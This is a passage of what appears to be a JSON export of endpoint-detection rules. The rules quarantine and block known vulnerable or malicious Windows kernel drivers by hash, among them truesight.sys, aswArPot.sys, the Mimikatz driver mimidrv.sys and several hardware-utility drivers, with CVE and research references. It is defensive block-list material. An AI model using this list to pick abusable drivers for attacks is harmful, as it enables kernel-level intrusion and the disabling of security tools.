"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827497Z", + "creation_date": "2026-03-23T11:45:31.827499Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827505Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "af80b334ef86d05d652a4eaa6edbf8544283e78752c5c84ec84d13edca228129", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0f1e891c-bbf5-5af5-a51b-f2a93b526d20", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479601Z", + "creation_date": "2026-03-23T11:45:30.479603Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479609Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "548c44566d19ba0975c9a22e7b592fda45bfa8831e56f55c1c3e7241d84dd175", + "comment": "Vulnerable Kernel Driver (aka HWiNFO64I.SYS) [https://www.loldrivers.io/drivers/080a834f-3e19-4cae-b940-a4ecf901db28/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0f210936-fe6d-5ff6-8357-9ac8ecbcaf53", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490945Z", + "creation_date": "2026-03-23T11:45:31.490957Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490966Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "93e6ee9a67a9720669944e22d76019b3b5cd63a4ca99dafc25a446c6136ed322", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0f21fe95-0426-517d-893e-112dd119ae07", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.820969Z", + "creation_date": "2026-03-23T11:45:31.820972Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.820981Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ed8815b30cf785d1748b62d154bcc09075648bea72495e68be0b9b8b342fd0af", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0f282c62-f551-556b-8839-18aeb7b3b1d5", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461324Z", + "creation_date": "2026-03-23T11:45:30.461328Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461336Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f4ee803eefdb4eaeedb3024c3516f1f9a202c77f4870d6b74356bbde32b3b560", + "comment": "Vulnerable Kernel Driver (aka sfdrvx64.sys) [https://www.loldrivers.io/drivers/5a03dc5a-115d-4d6f-b5b5-685f4c014a69/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0f3121cf-9ac1-579d-a37e-21ab691b5c07", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.142707Z", + "creation_date": "2026-03-23T11:45:32.142709Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.142715Z", + "rule_level": null, + "rule_level_override": 
null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cf9859b7126c8f1546911651d0f4a506c8802451807b695854429f8b79688a37", + "comment": "Vulnerable IKARUS anti.virus Driver (aka ntguard.sys and ntguard_x64.sys) [https://www.greyhathacker.net/?p=995, https://www.exploit-db.com/exploits/43139] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0f3ca033-702f-5d05-9889-39b20b8dcb24", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621461Z", + "creation_date": "2026-03-23T11:45:29.621463Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621468Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c344e92a6d06155a217a9af7b4b35e6653665eec6569292e7b2e70f3a3027646", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0f409154-88a5-5c90-92fe-87d19d219bca", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.466908Z", + "creation_date": "2026-03-23T11:45:30.466911Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.466920Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9a84ad211fc549d0f118b3211cb11fd3ab2ced86de9cd20173d03e1a47834133", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0f422f0d-8729-5ae4-80d9-814c54e5d56e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810716Z", + "creation_date": "2026-03-23T11:45:31.810718Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810723Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fda127b1df8d657e35b73f61384dfeeac17bf4d20e9e733488420a14b3a2578c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0f4953e8-71a4-5c34-a393-a46444428e8c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606611Z", + "creation_date": "2026-03-23T11:45:29.606613Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606618Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6dd992ad181d9a8ba8bc02542a5379375857460d8f2818ff6fc32f726aa431af", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0f509653-bf7d-5150-8788-578fe22d3c5f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.815689Z", + "creation_date": "2026-03-23T11:45:30.815691Z", + 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.815697Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "66a9052d6b1d35147f581249f6b524d8cab0b7c6ff80f621a4481f43db462540", + "comment": "Vulnerable Kernel Driver (aka RadHwMgr.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0f51834f-e8b6-5c64-b042-54a978fb8581", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810894Z", + "creation_date": "2026-03-23T11:45:31.810896Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810901Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c872de9c4d9b5d7f18a8789939951d691882da450b11793f59c9f4ef21fb621e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0f5bb38f-d477-5f16-a333-fcdbac5f80cd", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621774Z", + "creation_date": "2026-03-23T11:45:29.621776Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621782Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5aa7a47c7abaf13453b8ab309ef16bdd80ceaf7407e67fa27932d4591f025d67", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0f65c1a6-841e-557a-98d2-3ad57a62dfe0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971488Z", + "creation_date": "2026-03-23T11:45:29.971490Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971495Z", + "rule_level": null, + "rule_level_override": null, + 
"rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9a95a70f68144980f2d684e96c79bdc93ebca1587f46afae6962478631e85d0c", + "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0f6a52e0-c0be-527f-b9a2-764df05b0e48", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969785Z", + "creation_date": "2026-03-23T11:45:29.969787Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969792Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "59e004cd839611cbc5f7c061827587dbb120d7aab8d0e44191c0c01aeed9e168", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0f85c1a6-8c8f-544a-b4d7-5db7e09943c7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.468318Z", + "creation_date": "2026-03-23T11:45:30.468322Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.468330Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "67d4654d7e78e4d0761d8e200096935791d59acb2bf98106dafff449647c840f", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0fb68b29-3473-53ee-9689-96daac6b1333", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.481809Z", + "creation_date": "2026-03-23T11:45:31.481812Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.481823Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a56b64d3822154749911a8189edc435f70ebedddd1da76878e7a1ce3b0a2bd15", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0fb82f82-7cae-50ae-ab33-f0be416f9165", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489578Z", + "creation_date": "2026-03-23T11:45:31.489581Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489588Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5f47e8b63cbe05a0a83806501d7eecb6339c5a718f80f8f1866fa164595ca185", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0fb943dc-aacd-527c-ba74-255d63204b22", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", 
+ "last_update": "2026-03-23T11:45:29.610600Z", + "creation_date": "2026-03-23T11:45:29.610602Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610608Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8d57e416ea4bb855b78a2ff3c80de1dfbb5dc5ee9bfbdddb23e46bd8619287e2", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0fbe90a8-9c10-5814-8b58-32945e5e707c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615417Z", + "creation_date": "2026-03-23T11:45:29.615419Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615425Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4e92baa37cd8b665ca0851f8442766aaf3b96fa61ea137d5972d5eb059389a05", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0fc1ee8a-333d-5770-b7de-619bddb8fb7d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827928Z", + "creation_date": "2026-03-23T11:45:30.827930Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827935Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "df5548418a899fe0b375f35e196637cb873acb374a300c865f183af388ca40c2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0fc556da-9f78-5d44-993e-67fe027d4fbe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618237Z", + "creation_date": "2026-03-23T11:45:29.618239Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618244Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9368e51ec98e2ad20893a5fc21e6a8b20c5bee158d5c49ca58649cff84db9d68", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0fc90c00-c363-5593-ace6-7eeee1ee032e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972738Z", + "creation_date": "2026-03-23T11:45:29.972740Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972745Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f78e06f649bc0d88770c5465d7792abeb27631ec0ce9a0fa68698b94ebf2cf49", + "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"0fcb3917-67ca-54b5-af45-e3e3c5d6457e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.476436Z", + "creation_date": "2026-03-23T11:45:31.476440Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.476449Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "987249b8aad583f4de69b2371182db2d379381d175ea50b1ea0500de0394d57c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0fd2871d-6f8b-5ac3-a632-c2c583adfd98", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973148Z", + "creation_date": "2026-03-23T11:45:29.973150Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
